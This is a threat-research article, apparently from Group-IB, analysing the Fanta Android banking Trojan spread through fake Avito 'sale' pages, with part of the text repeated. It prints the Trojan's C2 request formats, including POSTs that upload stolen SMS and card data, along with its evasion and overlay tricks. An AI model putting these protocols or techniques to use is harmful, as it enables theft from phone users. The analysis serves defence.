One day you want to sell something on Avito and, having posted a detailed description of your product (for example, a RAM module), you will receive this message.
Once you open the link, you will see a seemingly innocuous page notifying you, the happy and successful seller, that a purchase has been made.
Once you click the “Continue” button, an APK file with an icon and a trust-inspiring name will be downloaded to your Android device. You installed an application that for some reason requested AccessibilityService rights, then a couple of windows appeared and quickly disappeared and... That's it.
You go to check your balance, but for some reason your banking app asks for your card details again. After entering the data, something terrible happens: for some reason still unclear to you, money begins to disappear from your account. You are trying to solve the problem, but your phone resists: it presses the “Back” and “Home” keys, does not turn off and does not allow you to activate any security measures. As a result, you are left without money, your goods have not been purchased, you are confused and wonder: what happened?
The answer is simple: you have become a victim of the Fanta Android Trojan, a member of the Flexnet family. How did this happen? Let's explain now.
Authors: Andrey Polovinkin, junior specialist in malware analysis, Ivan Pisarev, specialist in malware analysis.
The campaign described in this article is aimed at users from Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.
Even though Flexnet has been in the Android Trojan arena for over 4 years now and has been studied in detail by many researchers, it is still in good shape. Starting from January 2019, the potential amount of damage is more than 35 million rubles - and this is only for campaigns in Russia. In 2015, various versions of this Android Trojan were sold on underground forums, where the source code of the Trojan with a detailed description could also be found. This means that the statistics of damage in the world are even more impressive. Not a bad indicator for such an old man, isn't it?
A study of the shcet491[.]ru domain showed that it is delegated to Hostinger’s DNS servers:
The domain zone file contains entries pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243, and 31.220.23[.]235. However, the domain's primary resource record (A record) points to a server with IP address 178.132.1[.]240.
The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the WorldStream hoster . IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to the shared hosting server HOSTINGER. Openprov-ru is used as a registrar. The following domains also resolved to the IP address 178.132.1[.]240:
It should be noted that links in the following format were available from almost all domains:
http://(www.){0,1}<%domain%>/[0-9]{7}
This template also includes a link from SMS- messages. Based on historical data, it was found that one domain corresponds to several links in the pattern described above, which indicates that one domain was used to distribute the Trojan to several victims. Let's jump ahead a little: the Trojan downloaded via a link from an SMS uses the address onuseseddohap[.]club
as a control server . This domain was registered on 2019-03-12, and starting from 2019-04-29, APK applications interacted with this domain. Based on data obtained from VirusTotal, a total of 109 applications interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, located in the Netherlands and owned by the WorldStream hoster. Namecheap is used as the registrar . The domains bad-racoon[.]club (starting from 2018-09-25) and bad-racoon[.]live (starting from 2018-10-25) were also resolved to this IP address . More than 80 APK files interacted with the bad-racoon[.]club domain, and more than 100 interacted with bad-racoon[.]live . In general, the attack progressed as follows:
This check is carried out in the main service of the Trojan - MainService. When launched for the first time, the application’s configuration parameters are initialized to default values (the format for storing configuration data and their meaning will be discussed later), and a new infected device is registered on the control server. An HTTP POST request will be sent to the server with the register_bot message type and information about the infected device (Android version, IMEI, phone number, operator name and country code in which the operator is registered). The address hXXp://onuseseddohap[.]club/controller.php acts as the control server . In response, the server sends a message containing the fields bot_id, bot_pwd, server - the application saves these values as parameters of the CnC server. The server parameter is optional if the field was not received: Fanta uses the registration address - hXXp://onuseseddohap[.]club/controller.php. The function of changing the CnC address can be used to solve two problems: to distribute the load evenly between several servers (if there are a large number of infected devices, the load on an unoptimized web server can be high), and also to use an alternative server in the event of a failure of one of the CnC servers .
If an error occurs while sending the request, the Trojan will repeat the registration process after 20 seconds.
Once the device has been successfully registered, Fanta will display the following message to the user:
Important note: the service called System Security is the name of the Trojan service, and after clicking the OK button , a window with the Accessibility settings of the infected device will open, where the user must himself issue Accessibility rights for the malicious service:
As soon as the user enables the AccessibilityService, Fanta gains access to the contents of application windows and the actions performed in them:
Immediately after receiving Accessibility rights, the Trojan requests administrator rights and rights to read notifications:
Using the AccessibilityService, the application simulates keystrokes, thereby giving itself all the necessary rights.
Fanta creates multiple database instances (which will be described later) necessary to store configuration data, as well as information collected in the process about the infected device. To send the collected information, the Trojan creates a repeating task designed to download fields from the database and receive a command from the control server. The interval for accessing CnC is set depending on the Android version: in the case of 5.1, the interval will be 10 seconds, otherwise 60 seconds.
To receive a command, Fanta makes a GetTask request to the control server. In response, CnC can send one of the following commands:
Fanta also collects notifications from 70 banking apps, fast payment systems and e-wallets and stores them in a database.
Fanta also uses the smsManager file:
The Trojan uses a database to store the information it collects and log its actions. The data is stored in the logs table . To create a table, use the following SQL query:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
The database contains the following information:
1. Logging that the infected device is turned on with the message Phone turned on!
2. Notifications from applications. The message is generated according to the following template:
3. Bank card data from phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:
The message is logged in the format:
4. Incoming/outgoing SMS messages in the format:
5. Information about the package that creates the dialog box in the format:
One of the functionality of Fanta is the collection of information about bank cards. Data collection occurs through the creation of phishing windows when opening banking applications. The Trojan creates the phishing window only once. The information that the window was shown to the user is stored in the settings table in the fanta.db database . To create a database, use the following SQL query:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
All fields in the settings table are initialized to 1 by default (create phishing window). After the user enters his data, the value will be set to 0. Example of settings table fields:
Using the functionality of the AccessibilityService, the Trojan monitors changes to elements on the screen of the infected device. As previously described, the Fanta settings contain a parameter responsible for logging operations with dialog boxes - readDialog. If this parameter is set, information about the name and description of the package that triggered the event will be added to the database. The Trojan performs the following actions when events are triggered:
Once you open the link, you will see a seemingly innocuous page notifying you, the happy and successful seller, that a purchase has been made.
Once you click the “Continue” button, an APK file with an icon and a trust-inspiring name will be downloaded to your Android device. You installed an application that for some reason requested AccessibilityService rights, then a couple of windows appeared and quickly disappeared and... That's it.
You go to check your balance, but for some reason your banking app asks for your card details again. After entering the data, something terrible happens: for some reason still unclear to you, money begins to disappear from your account. You are trying to solve the problem, but your phone resists: it presses the “Back” and “Home” keys, does not turn off and does not allow you to activate any security measures. As a result, you are left without money, your goods have not been purchased, you are confused and wonder: what happened?
The answer is simple: you have become a victim of the Fanta Android Trojan, a member of the Flexnet family. How did this happen? Let's explain now.
Authors: Andrey Polovinkin, junior specialist in malware analysis, Ivan Pisarev, specialist in malware analysis.
Some statistics
The Flexnet family of Android Trojans first became known back in 2015. Over a fairly long period of activity, the family expanded to several subspecies: Fanta, Limebot, Lipton, etc. The Trojan, as well as the infrastructure associated with it, do not stand still: new effective distribution schemes are being developed - in our case, high-quality phishing pages aimed at a specific user-seller, and the Trojan developers follow fashionable trends in virus writing - adding new functionality that makes it possible to steal more efficiently money from infected devices and bypass protection mechanisms.The campaign described in this article is aimed at users from Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.
Even though Flexnet has been in the Android Trojan arena for over 4 years now and has been studied in detail by many researchers, it is still in good shape. Starting from January 2019, the potential amount of damage is more than 35 million rubles - and this is only for campaigns in Russia. In 2015, various versions of this Android Trojan were sold on underground forums, where the source code of the Trojan with a detailed description could also be found. This means that the statistics of damage in the world are even more impressive. Not a bad indicator for such an old man, isn't it?
From sale to deception
As can be seen from the previously presented screenshot of a phishing page for the Internet service for posting ads Avito, it was prepared for a specific victim. Apparently, the attackers use one of Avito’s parsers, which extracts the phone number and name of the seller, as well as the product description. After expanding the page and preparing the APK file, the victim is sent an SMS with his name and a link to a phishing page containing a description of his product and the amount received from the “sale” of the product. By clicking on the button, the user receives a malicious APK file - Fanta.A study of the shcet491[.]ru domain showed that it is delegated to Hostinger’s DNS servers:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
The domain zone file contains entries pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243, and 31.220.23[.]235. However, the domain's primary resource record (A record) points to a server with IP address 178.132.1[.]240.
The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the WorldStream hoster . IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to the shared hosting server HOSTINGER. Openprov-ru is used as a registrar. The following domains also resolved to the IP address 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
It should be noted that links in the following format were available from almost all domains:
http://(www.){0,1}<%domain%>/[0-9]{7}
This template also includes a link from SMS- messages. Based on historical data, it was found that one domain corresponds to several links in the pattern described above, which indicates that one domain was used to distribute the Trojan to several victims. Let's jump ahead a little: the Trojan downloaded via a link from an SMS uses the address onuseseddohap[.]club
as a control server . This domain was registered on 2019-03-12, and starting from 2019-04-29, APK applications interacted with this domain. Based on data obtained from VirusTotal, a total of 109 applications interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, located in the Netherlands and owned by the WorldStream hoster. Namecheap is used as the registrar . The domains bad-racoon[.]club (starting from 2018-09-25) and bad-racoon[.]live (starting from 2018-10-25) were also resolved to this IP address . More than 80 APK files interacted with the bad-racoon[.]club domain, and more than 100 interacted with bad-racoon[.]live . In general, the attack progressed as follows:
What's under Fanta's lid?
Like many other Android Trojans, Fanta is capable of reading and sending SMS messages, making USSD requests, and displaying its own windows on top of applications (including banking ones). However, the arsenal of functionality of this family has arrived: Fanta began to use the AccessibilityService for various purposes: reading the contents of notifications of other applications, preventing detection and stopping the execution of a Trojan on an infected device, etc. Fanta works on all versions of Android no younger than 4.4. In this article we will take a closer look at the following Fanta sample:- MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immediately after launch
Immediately after launch, the Trojan hides its icon. The application can only work if the name of the infected device is not in the list:- android_x86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(razor)
This check is carried out in the main service of the Trojan - MainService. When launched for the first time, the application’s configuration parameters are initialized to default values (the format for storing configuration data and their meaning will be discussed later), and a new infected device is registered on the control server. An HTTP POST request will be sent to the server with the register_bot message type and information about the infected device (Android version, IMEI, phone number, operator name and country code in which the operator is registered). The address hXXp://onuseseddohap[.]club/controller.php acts as the control server . In response, the server sends a message containing the fields bot_id, bot_pwd, server - the application saves these values as parameters of the CnC server. The server parameter is optional if the field was not received: Fanta uses the registration address - hXXp://onuseseddohap[.]club/controller.php. The function of changing the CnC address can be used to solve two problems: to distribute the load evenly between several servers (if there are a large number of infected devices, the load on an unoptimized web server can be high), and also to use an alternative server in the event of a failure of one of the CnC servers .
If an error occurs while sending the request, the Trojan will repeat the registration process after 20 seconds.
Once the device has been successfully registered, Fanta will display the following message to the user:
Important note: the service called System Security is the name of the Trojan service, and after clicking the OK button , a window with the Accessibility settings of the infected device will open, where the user must himself issue Accessibility rights for the malicious service:
As soon as the user enables the AccessibilityService, Fanta gains access to the contents of application windows and the actions performed in them:
Immediately after receiving Accessibility rights, the Trojan requests administrator rights and rights to read notifications:
Using the AccessibilityService, the application simulates keystrokes, thereby giving itself all the necessary rights.
Fanta creates multiple database instances (which will be described later) necessary to store configuration data, as well as information collected in the process about the infected device. To send the collected information, the Trojan creates a repeating task designed to download fields from the database and receive a command from the control server. The interval for accessing CnC is set depending on the Android version: in the case of 5.1, the interval will be 10 seconds, otherwise 60 seconds.
To receive a command, Fanta makes a GetTask request to the control server. In response, CnC can send one of the following commands:
| Team | Description |
|---|---|
| 0 | Send SMS message |
| 1 | Make a phone call or USSD command |
| 2 | Updates the interval parameter |
| 3 | Updates the intercept parameter |
| 6 | Updates the smsManager parameter |
| 9 | Start collecting SMS messages |
| 11 | Reset your phone to factory settings |
| 12 | Enable/Disable logging of dialog box creation |
Storing configuration parameters
To store configuration parameters, Fanta uses a standard approach for the Android platform - Preferences files. The settings will be saved to a file called settings. A description of the saved parameters is in the table below.| Name | Default value | Possible values | Description |
|---|---|---|---|
| id | 0 | Integer | Bot ID |
| server | hXXp://onuseseddohap[.]club/ | URL | Control server address |
| pwd | - | String | Server password |
| interval | 20 | Integer | Time interval. Indicates how long the following tasks should be deferred:
|
| intercept | all | all/telNumber | If the field is equal to the string all or telNumber , then the received SMS message will be intercepted by the application and not shown to the user |
| smsManager | 0 | 0/1 | Enable/disable the application as the default SMS recipient |
| readDialog | false | True/false | Enable/Disable logging of AccessibilityEvent events |
Fanta also uses the smsManager file:
| Name | Default value | Possible values | Description |
|---|---|---|---|
| pckg | - | String | Name of SMS message manager used |
Interaction with databases
During its operation, the Trojan uses two databases. A database named a is used to store various information collected from the phone. The second database is named fanta.db and is used to save settings responsible for creating phishing windows designed to collect information about bank cards.The Trojan uses a database to store the information it collects and log its actions. The data is stored in the logs table . To create a table, use the following SQL query:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
The database contains the following information:
1. Logging that the infected device is turned on with the message Phone turned on!
2. Notifications from applications. The message is generated according to the following template:
Code:
(<%App Name%>)<%Title%>: <%Notification text%>3. Bank card data from phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:
- AliExpress
- Grandfather
- Google Play
- Miscellaneous <%App Name%>
The message is logged in the format:
Code:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>4. Incoming/outgoing SMS messages in the format:
Code:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>5. Information about the package that creates the dialog box in the format:
Code:
(<%Package name%>)<%Package information%>One of the functionality of Fanta is the collection of information about bank cards. Data collection occurs through the creation of phishing windows when opening banking applications. The Trojan creates the phishing window only once. The information that the window was shown to the user is stored in the settings table in the fanta.db database . To create a database, use the following SQL query:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
All fields in the settings table are initialized to 1 by default (create phishing window). After the user enters his data, the value will be set to 0. Example of settings table fields:
- can_login — the field is responsible for displaying the form when opening a banking application
- first_bank - not used
- can_avito - the field is responsible for displaying the form when opening the Avito application
- can_ali - the field is responsible for displaying the form when opening the Aliexpress application
- can_another - the field is responsible for displaying the form when opening any application from the list: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
- can_card - the field is responsible for displaying the form when opening Google Play
Interaction with the management server
Network interaction with the management server occurs via the HTTP protocol. To work with the network, Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php . The server address can be changed when registering on the server. Cookies may be sent in response from the server. Fanta makes the following requests to the server:- Registration of the bot on the control server occurs once, upon first launch. The following data about the infected device is sent to the server:
· Cookie — cookies received from the server (default value is an empty string)
· mode — string constant register_bot
· prefix — integer constant 2
· version_sdk — generated according to the following template: <%Build.MODEL% >/<%Build.VERSION.RELEASE%>(Avit)
· imei — IMEI of the infected device
· country — code of the country in which the operator is registered, in ISO format
· number — phone number
· operator — name of the operator
Example of a request sent to the server :
Code:POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
In response to the request, the server must return a JSON object containing the following parameters:
· bot_id — identifier of the infected device. If bot_id is equal to 0, Fanta will re-execute the request.
· bot_pwd — password for the server.
· server —address of the management server. Optional parameter. If the parameter is not specified, the address saved in the application will be used.
Example JSON object:
Code:{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Request to receive a command from the server. The following data is sent to the server:
· Cookie – cookies received from the server
· bid – id of the infected device, which was received when sending a register_bot request
· pwd – password for the server
· divice_admin – the field determines whether administrator rights have been obtained. If administrator rights have been obtained, the field is equal to 1 , otherwise 0
· Accessibility —operation status of the Accessibility Service. If the service was started, the value is 1 , otherwise 0
· SMSManager - shows whether the Trojan is enabled as the default application for receiving SMS
· screen - displays what state the screen is in. Will be set to 1 if the screen is on, otherwise 0 ;
An example of a request sent to the server:
Code:POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Depending on the command, the server can return a JSON object with different parameters:
· Send SMS message command : The parameters contain the phone number, the text of the SMS message and the ID of the message being sent. The identifier is used when sending a message to the server with the setSmsStatus type .
Code:{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· Command Make a phone call or USSD command : The phone number or command comes in the response body.
Code:{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· Command Change interval parameter .
Code:{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· Command Change intercept parameter .
Code:{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· Command Change SmsManager field .
Code:{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· Command Collect SMS messages from an infected device .
Code:{ "response": [ { "mode": 9 } ], "status":"ok" }
· Command Reset phone to factory settings :
Code:{ "response": [ { "mode": 11 } ], "status":"ok" }
· Command Change ReadDialog parameter .
Code:{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Sending a message with type setSmsStatus. This request is carried out after executing the Send SMS message command. The request looks like this:
Code:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Uploading database contents. One row is transmitted per request. The following data is sent to the server:
Cookie - cookies received from the server mode - string constant setSaveInboxSms bid - id of the infected device that was received when sending the register_bot request text - text in the current database record (field d from the logs table in the database a ) · number - name of the current database record (field p from the logs table in database a ) · sms_mode - integer value (field m from the logs table in database a ) The request looks like this:
Code:POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
If successfully sent to the server, the row will be deleted from the table. Example of a JSON object returned by the server:
Code:{ "response":[], "status":"ok" }
Interaction with AccessibilityService
AccessibilityService was implemented to make Android devices easier to use for people with disabilities. In most cases, physical interaction is required to interact with an application. AccessibilityService allows you to do them programmatically. Fanta uses the service to create fake windows in banking applications and prevent users from opening system settings and some applications.Using the functionality of the AccessibilityService, the Trojan monitors changes to elements on the screen of the infected device. As previously described, the Fanta settings contain a parameter responsible for logging operations with dialog boxes - readDialog. If this parameter is set, information about the name and description of the package that triggered the event will be added to the database. The Trojan performs the following actions when events are triggered:
- Simulates pressing the back and home keys in the following cases:
· if the user wants to restart his device
· if the user wants to delete the “Avito” application or change access rights
· if there is a mention of the “Avito” application on the page
· when opening the “Google Play Protection” application
· when opening pages with AccessibilityService settings
· when the “System Security” dialog box appears
· when opening a page with “Draw over other app” settings
· when opening the page “Applications”, “Backup and reset”, “Reset data”, “Reset settings” , “Developer Panel”, “Special. capabilities”, “Special capabilities”, “Special rights”
· if the event was generated by certain applications.
List of applications - If permission is requested when sending an SMS message to a short number, Fanta simulates clicking on the Remember selection checkbox and the send button .
- When you try to take away administrator rights from the Trojan, it locks the phone screen.
- Prevents adding new administrators.
- If the dr.web antivirus application detects a threat, Fanta simulates clicking the ignore button .
- The Trojan simulates pressing the back and home button if the event was generated by the Samsung Device Care application .
- Fanta creates phishing windows with forms for entering information about bank cards if an application from a list of about 30 different Internet services was launched. Among them: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Phishing forms
Fanta analyzes which applications are running on the infected device. If an application of interest was opened, the Trojan displays a phishing window on top of all others, which is a form for entering bank card information. The user must enter the following data:- Card number
- Card expiry date
- CVV
- Cardholder name (not for all banks)
How it really was
Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. Therefore, the real, non-director’s version differs from the one told earlier: a person received an interesting SMS, after which he gave it to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. Happy ending, right? However, not all stories end so successfully, and so that yours does not look like a director’s cut with a loss of money, in most cases it is enough to adhere to the following long-described rules:- do not install applications for a mobile device with Android OS from any sources other than Google Play
- When installing an application, pay special attention to the rights requested by the application
- pay attention to the extensions of downloaded files
- install Android OS updates regularly
- do not visit suspicious resources and do not download files from there
- Do not click on links received in SMS messages.
Group-IB knows everything about cybercrime, but they tell you the most interesting things.
An action-packed Telegram channel (https://t.me/Group_IB) about information security, hackers and cyber attacks, hacktivists and Internet pirates. Step-by-step investigations into high-profile cybercrimes, practical cases using Group-IB technologies and, of course, recommendations on how to avoid becoming a victim on the Internet.
YouTube channel here
Group-IB photo feed on Instagram www.instagram.com/group_ib
Short news on Twitter twitter.com/GroupIB
Group-IB is one of the leading developers of solutions for detecting and preventing cyber attacks, detecting fraud and protecting intellectual property on the network with headquarters in Singapore.
